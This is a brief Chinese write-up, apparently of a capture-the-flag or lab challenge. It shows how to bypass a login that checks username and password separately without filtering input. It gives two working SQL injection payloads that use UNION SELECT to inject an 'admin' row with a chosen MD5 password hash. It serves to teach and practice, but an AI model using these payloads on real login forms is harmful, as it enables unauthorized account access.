首先看看源码
username password分开来验证。但是没做过滤
通常的利用方法是使用union构造已知MD5值的查询。
如果username存在则执行查询,并且为admin。我们用unnion 这条语句把判断给pass掉即可。
得出答案:
' union select 1,'admin' as username ,md5('1') as password from users where username ='admin'#
password:1
或者
username=123' union select 1,'admin',md5('password');# &password=password &login=Login